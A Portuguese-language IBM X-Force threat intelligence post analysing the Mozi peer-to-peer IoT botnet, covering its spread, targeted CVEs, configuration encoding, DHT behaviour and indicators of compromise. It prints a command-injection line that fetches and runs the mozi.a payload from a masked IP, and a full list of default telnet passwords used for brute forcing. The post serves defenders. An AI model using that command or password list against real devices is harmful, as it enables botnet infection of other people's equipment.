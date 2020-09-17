Segurança

Um novo ataque de botnet acaba de chegar

Programadora concentrada enquanto trabalha no computador em sua mesa no escritório

Autora

Dave McMillen

Senior Threat Researcher

IBM X-Force

Wei Gao

Malware Reverse Engineer

Charles DeBeck

Senior Cyber Threat Intelligence Analyst - IBM

Um player relativamente novo na área de ameaças, o botnet Mozi, disparou entre os dispositivos da Internet das Coisas (IoT), de acordo com o IBM X-Force.

Este malware está ativo desde o final de 2019 e possui código em comum com o Mirai e suas variantes. O Mozi foi responsável por quase 90% do tráfego de rede IoT observado de outubro de 2019 a junho de 2020.

Essa surpreendente aquisição foi acompanhada por um enorme aumento na atividade geral de botnets de IoT, sugerindo que o Mozi não removeu os concorrentes do mercado. Em vez disso, inundou o mercado, superando a atividade de outras variantes. No geral, o número combinado de ataques a dispositivos IoT desde outubro de 2019, quando os ataques começaram a aumentar consideravelmente, até junho de 2020, é 400% maior do que o número combinado de ataques a dispositivos IoT nos dois anos anteriores.

Gráfico do volume de ataques à IoT de junho de 2018 a maio de 2020

Esse aumento nos ataques à IoT pode ter várias causas, mas, em parte, pode ser resultado de um cenário em constante expansão para os agentes da ameaça. Existem cerca de 31 bilhões de dispositivos de IoT implementados em todo o mundo, e a taxa de implementação da IoT é atualmente de 127 dispositivos por segundo.

Os invasores estão aproveitando esses dispositivos há algum tempo, principalmente por meio da botnet Mirai. A equipe do IBM X-Force Incident Response and Intelligence Services (IRIS) faz esse acompanhamento há quase quatro anos. Então, por que o salto repentino? Pesquisas da IBM sugerem que o Mozi continua tendo sucesso, em grande parte, por meio do uso de ataques de injeção de comando (CMDi), que geralmente resultam da configuração incorreta de dispositivos de IOT. O crescimento contínuo do uso da IoT e os protocolos de configuração inadequados são os prováveis culpados por esse aumento. Esse aumento pode ter sido ainda mais impulsionado pelo acesso mais frequente às redes corporativas remotamente devido à COVID-19.

Dispositivos de IoT estão por toda parte

Um botnet de IoT pode ser usado para realizar ataques de distributed denial-of-service (DDoS) , roubar dados e enviar spam. Há uma infinidade de tipos diferentes de dispositivos de IOT para explorar:

  • IoT do consumidor: dispositivos domésticos, como câmeras de segurança, controle de iluminação, eletrodomésticos etc.
  • IoT comercial: dispositivos projetados para uso em vários setores. Por exemplo, o setor de saúde tem pacemakers e monitores conectados à internet. Os setores de transporte e construção utilizam dispositivos associados a rastreadores de veículos, telemática, sistemas de logística e cadeia de suprimentos e modelagem da informação da construção.
  • IoT empresarial: dispositivos projetados para uso em escritórios, como projetores, roteadores, sistemas de segurança e publicidade digital.
  • IoT industrial: sistemas de controle industrial, sistemas de automação de linha de produção, controladores lógicos e sistemas de aeronaves.
  • Infraestrutura IOT: sistemas de gestão de cidades inteligentes, dispositivos de controle de tráfego, dispositivos de monitoramento de utilitários etc.
  • Internet das coisas militares: dispositivos biométricos vestíveis para combate, robôs e equipamentos de vigilância.

Essa grande superfície de ataque deixa as organizações vulneráveis aos botnets de IoT. Some isso às falhas de segurança que esses dispositivos frequentemente apresentam logo ao sair da fábrica e às práticas de reforço de segurança pouco rigorosas durante a implementação. A vulnerabilidade mais notável na IoT ocorre por meio de ataques CMDi.

Boletim informativo do setor

As mais recentes notícias de tecnologia, corroboradas por insights de especialistas.

Mantenha-se atualizado sobre as tendências mais importantes (e intrigantes) do setor em IA, automação, dados e muito mais com o boletim informativo Think. Consulte a Declaração de privacidade da IBM.

Agradecemos sua inscrição!

Sua assinatura será entregue em inglês. Você pode encontrar um link para cancelar a assinatura em todos os boletins informativos. Você pode gerenciar suas inscrições ou cancelar a inscrição aqui. Consulte nossa Declaração de privacidade da IBM para obter mais informações.

Ataques CMDi disseminam o botnet Mozi

Quase todos os direcionamentos de IoT observados pela IBM tentaram usar ataques CMDi para obter acesso inicial ao dispositivo. Se o endpoint alvo fosse um dispositivo IoT e suscetível a esses ataques, a carga útil era baixada e executada.

Os ataques CMDi são extremamente populares contra dispositivos de IoT por vários motivos. Primeiro, os sistemas integrados de IoT geralmente contêm uma interface web e uma interface de depuração remanescentes do desenvolvimento de firmware que podem ser exploradas. Em segundo lugar, os módulos PHP incorporados às interfaces da IoT web podem ser explorados, fornecendo recursos de execução remota a agentes maliciosos. Em terceiro lugar, as interfaces de IoT muitas vezes ficam vulneráveis quando implementadas porque os administradores não conseguem fortalecer as interfaces limpando as entradas remotas esperadas. Isso permite que os agentes da ameaça façam input de comandos de shell, como “wget”.

Nossa análise revelou que o botnet Mozi aproveitou o CMDi usando um comando shell “wget” e alterando as permissões para permitir que o agente da ameaça interagisse com o sistema afetado. Por exemplo:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Se o host estivesse vulnerável ao CMDi, esse comando faria o download e executaria um arquivo chamado "mozi.a". A análise dessa amostra específica indica que o arquivo é executado em um microprocessador sem a arquitetura de Interlocked Pipeline Stages (MIPS). Essa é uma extensão entendida por máquinas que executam a arquitetura RISC (computador com conjunto de instruções reduzido), que é predominante em muitos dispositivos de IoT. Depois que o invasor obtiver acesso total ao dispositivo por meio do botnet, o nível do firmware poderá ser alterado e malware adicional poderá ser implantado no dispositivo.

Embora este exemplo cite um vetor bem conhecido, ele pode continuar a ser eficaz por duas razões principais. Em primeiro lugar, novas vulnerabilidades permitem a atualização constante das tentativas de invasão via CMDi, e a implementação lenta de patches pode ser explorada. Em segundo lugar, essa atividade é facilmente automatizada, permitindo que o agente da ameaça atinja uma ampla gama de dispositivos de forma rápida e com baixo custo.

A infraestrutura do botnet Mozi parece ter origem principalmente na China, representando 84% da infraestrutura observada. Esse fato está alinhado com outras pesquisas de código aberto sobre a atividade da IoT em 2020.

Abaixo está uma lista de vulnerabilidades que a IBM observou que o botnet Mozi está tentando explorar:

VulnerabilidadeDispositivo afetado
CVE-2017-17215Huawei HG532
CVE-2018-10561 / CVE-2018-10562Roteadores GPON
CVE-2014-8361Dispositivos que usam o Realtek SDK
Roteador sem fio Eir D1000 RCIRoteador sem fio Eir D1000
CVE-2008-4873Sepal SPBOARD
CVE-2016-6277Netgear R7000 / R6400
Netgear setup.cgi RCE não autenticadoNetgear DGN1000
Execução de comandos do DVR MVPowerMVPower DVR TV-7104HE
CVE-2015-2051Dispositivos D-Link
Execução de comandos SOAP UPnP da D-LinkDispositivos D-Link
Fornecedores de CCTV-DVR RCEVários fornecedores de CCTV-DVR
Mixture of Experts | 12 de dezembro, episódio 85

Decodificando a IA: resumo semanal das notícias

Participe do nosso renomado painel de engenheiros, pesquisadores, líderes de produtos e outros enquanto filtram as informações sobre IA para trazerem a você as mais recentes notícias e insights sobre IA.
Veja todos os episódios de Mixture of Experts

Análise técnica do Mozi Botnet

O botnet Mozi é uma botnet peer-to-peer (P2P) baseada no protocolo Distributed Sloppy Hash Table (DSHT), que pode se espalhar por meio de exploração de IOT e senhas fracas de telnet.

Após a execução, o botnet Mozi tenta vincular a porta UDP local 14737. A amostra lê /proc/net/tcp ou /proc/net/raw para localizar e encerrar processos que usam as portas 1536 e 5888. A amostra verifica se o arquivo /usr/bin/python existe. Se existir, a amostra alterará seu nome de processo para sshd. Caso contrário, é alterado para dropbear.

Sabe-se que o botnet Mozi tem pelo menos duas características exclusivas. Ele usa o ECDSA384 (algoritmo de assinatura digital de curva elíptica 384) para verificar a sua integridade. Além disso, reutiliza partes do código do Gafgyt.

Ele contém nós públicos DHT codificados, que podem ser usados para ingressar na rede P2P. Esses nós são:

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

O botnet Mozi contém quatro recursos principais. Ele pode conduzir ataques DDoS (HTTP, TCP, UDP); realizar ataque de execução de comando; fazer download de carga útil maliciosa de URL especificada e executá-la; além de coletar informações do bot.

Lista de arquivos

A tabela abaixo contém detalhes importantes sobre os arquivos analisados. Os detalhes incluem tanto os arquivos submetidos quanto os arquivos residuais. (Arquivos residuais são arquivos que são extraídos de forma estática ou dinâmica durante a análise de malware.) Os dados incluem nome, categoria conforme determinado pela análise, hash e linhagem do arquivo em relação aos outros arquivos da tabela.

Nome do arquivoCategoria do arquivoHash do arquivoLinhagem
mozi.mBotnet4dde761681684d7edad4e5e1ffdb940bN/D
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0aBotnet86d42d968d3d12c36722e16c78e49ffbmozi.m
mozi.aBotnet9a111588a7db15b796421bd13a949cd4N/D
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053dBotnetdd4b6f3216709e193ed9f06c37bcc3890mozi.a

Análise comportamental do botnet Mozi

Após a execução, a amostra tenta vincular a porta UDP local 14737. A amostra lê /proc/net/tcp ou /proc/net/raw para localizar e encerrar processos que usam as portas 1536 e 5888. A amostra verifica se o arquivo /usr/bin/python existe. Se existir, a amostra alterará seu nome de processo para sshd. Caso contrário, será alterada para dropBear:

A amostra verifica se o arquivo /usr/bin/python existe. Se existir, a amostra alterará seu nome de processo para sshd. Caso contrário, será alterado para dropBear

A amostra também tenta atualizar a lista de controle de acesso para bloquear SSH e telnet para evitar que outros botnets utilizem.

iptables -I INPUT  -p tcp –destination-port 22 -j DROP
iptables -I INPUT  -p tcp –destination-port 23 -j DROP
iptables -I INPUT  -p tcp –destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp –source-port 22 -j DROP
iptables -I OUTPUT -p tcp –source-port 23 -j DROP
iptables -I OUTPUT -p tcp –source-port 2323 -j DROP

Também seleciona aleatoriamente portas predefinidas na iptable:

Captura de tela feita para a postagem do blog

DHT

O botnet Mozi usa um protocolo DHT personalizado para desenvolver sua rede P2P. O processo de entrada de um novo nó Mozi na rede DHT é o seguinte:

  • Um novo nó Mozi enviará uma solicitação HTTP inicial para http[:]//ia[.]51[.]la para se registrar.
  • Um novo nó Mozi envia uma consulta DHT find_node para oito nós públicos DHT predefinidos e conecta esses nós para se juntar à rede. O find node é usado para encontrar as informações de contato de um nó com seu ID. Esses oito nós públicos de DHT codificados são os seguintes:
dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

A amostra precisa gerar um ID para o nó atual. De acordo com um relatório da 360 Netlab sobre o Mozi,  o “ID tem 20 bytes e consiste no prefixo 888888 incorporado na amostra ou no prefixo especificado pelo arquivo de configuração [hp], mais uma string gerada aleatoriamente”. O arquivo de configuração é mostrado abaixo:.

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

Para ingressar na rede DHT, a amostra envia uma consulta ping para esses nós públicos DHT predefinidos. A consulta de ping com o ID do nó é exibida no tráfego na figura do Wireshark abaixo

A consulta ping com o ID do nó é mostrada no tráfego no Wireshark

Análise estática

Ambas as amostras são empacotadas usando um packer UPX personalizado. Ele deixa o valor de p_file_size e p_blocksize como zero na estrutura p_info.

Arquivo de configuração

A amostra contém um arquivo de configuração fixo, conforme mostrado abaixo:

Amostra que contém um arquivo de configuração predefinido

Contém quatro seções:

  • Azul: dados de configuração (428 bytes)
  • Verde: assinatura 1 ECDSA384 (96 bytes)
  • Vermelho: versão de configuração (4 bytes)
  • Preto: assinatura 2 ECDSA384 (96 bytes)

Os dados de configuração são codificados usando uma chave XOR fixa, 4E665A8F80C8AC238DAC4706D54F6F7E. Os dados de configuração decodificados são mostrados abaixo:

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

Os dados de configuração suportam vários comandos que são etiquetados da seguinte forma:

Tag (Comando)Descrição
[ss]Função de bot
[ssx]ativar/desativar tag [ss]
[cpu]Arquitetura da CPU
[cpux]ativar/desativar tag [cpu]
[nd]novo nó DHT
[hp]Prefixo de hash do nó DHT
[atk]Tipo de ataque DDoS
[ver]Valor na seção V no protocolo DHT
[sv]Atualizar configuração
[ud]Atualizar bot
[dr]Fazer o download e executar a carga útil da URL especificada
[rn]Executar o comando especificado
[dip]IP:porta para baixar o bot Mozi
[idp]bot de relatório
[count]URL usada para denunciar o bot

O botnet Mozi reutiliza partes do código Gafgyt no ataque DDoS. Ele suporta vários tipos de ataques DDoS, como HTTP, TCP e UDP.

A assinatura 1 do ECDSA384 é usada para verificar o valor de hash dos dados de configuração. A chave pública codificada usada para verificação é:

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 
E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 
22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 
88

É codificado com a chave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. A chave pública decodificada é:

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 
a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 
6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 
c6

A versão de configuração determina quando atualizar o bot. Ele atualizará o bot quando esse valor for maior que seu valor atual. A assinatura 2 ECDSA384 é usada para verificar essas três primeiras partes do arquivo de configuração. A chave pública codificada usada para verificação é:

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 
69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 
38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 
A1

É codificado com a chave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. A chave pública decodificada é:

02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 
27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 
76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea 
ef

Enumeração de login do Telnet

Além das vulnerabilidades que o botnet Mozi explora para obter acesso ao dispositivo vítima, também pode forçar credenciais de telnet usando uma lista de credenciais determinada:

root
admin
CUAdmin
default
rapport
super
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
1111
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm

Segue abaixo uma amostra de ataque de força bruta a uma rede Telnet:

Força bruta de um login telnet

Indicadores

Mozi.m e Mozi.a

Rede

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Strings notáveis (descompactadas)

8.8.8.8
/proc/net/route
Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatível; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatível; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, como Gecko) Versão/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, como Gecko) Versão/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, como Gecko) Versão/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) como Gecko
Mozilla/4.0 (compatível; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Versão/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Versão/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, como Gecko) Versão/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, como Gecko) Versão/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatível; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatível; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatível; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
GET
HEAD
POST
./config
/tmp/config
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1”
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
iptables -I INPUT  -p tcp –destination-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp –source-port 7547 -j DROP
[cpux]
[/cpux]
[cpu]
[/cpu]
[ssx]
[/ssx]
[ss]
[/ss]
none
[sv]
[/sv]
[rn]
[/rn]
run:
[nd]
[/nd]
/tmp
/var
/temp
iptables -I INPUT  -p udp –destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp –source-port %d -j ACCEPT
iptables -I PREROUTING  -t nat -p udp –destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT
0.0.0.0
[idp]
Esse nó não aceita announces
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881

Conclusão

O cenário de botnets de IOT continua mudando, e os dados da IBM sugerem que os agentes de ameaça permanecem ativos nesse espaço. Com o aumento das operações de novos grupos de botnets, como o Mozi, e o crescimento da atividade geral da IoT, as organizações que utilizam dispositivos de IoT precisam estar atentas à evolução dessa ameaça. A IBM tem observado um aumento no número de ataques a dispositivos IoT corporativos. A injeção de comando continua sendo o principal vetor de infecção preferido dos agentes da ameaça, reiterando a importância de alterar as configurações padrão do dispositivo e usar testes de penetração para encontrar e fazer correções nas lacunas de blindagem.

Atributos do arquivo

Metadados do Mozi.m

Nome do arquivo:Mozi.m
Tamanho do arquivo:108.808
MD5:4dde761681684d7edad4e5e1ffdb940b
SHA1:2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Tipo de arquivo:Executável ELF de 32 bits MSB, MIPS, MIPS-I versão 1 (SYSV), vinculado estaticamente, sem formatação
Categoria:Botnet
Nome IRIS:Mozi
Outros nomes:

Metadados do Mozi.a

Nome do arquivo:Mozi.a
Tamanho do arquivo:95.268
MD5:9a111588a7db15b796421bd13a949cd4
SHA1:034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256:e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
Tipo de arquivo:Executável ELF de 32 bits LSB, ARM, versão 1, vinculado estaticamente, sem formatação
Categoria:Botnet
Nome IRIS:Mozi
Outros nomes: 

5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadados

Nome do arquivo:d546_unpacked
Tamanho do arquivo:266.108
MD5:86d42d968d3d12c36722e16c78e49ffb
SHA1:ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256:5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
Tipo de arquivo:Executável ELF de 32 bits MSB, MIPS, MIPS-I versão 1 (SYSV), vinculado estaticamente, sem formatação
Categoria:Botnet
Nome IRIS:Mozi
Outros nomes: 

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadados

Nome do arquivo:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Tamanho do arquivo:212.464
MD5:dd4b6f3216709e193ed9f06c37bcc389
SHA1:758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Tipo de arquivo:b'ELF 32-bit LSB executável, ARM, versão 1, vinculado estaticamente, sem formatação'
Categoria:Botnet
Nome IRIS:Mozi
Outros nomes: 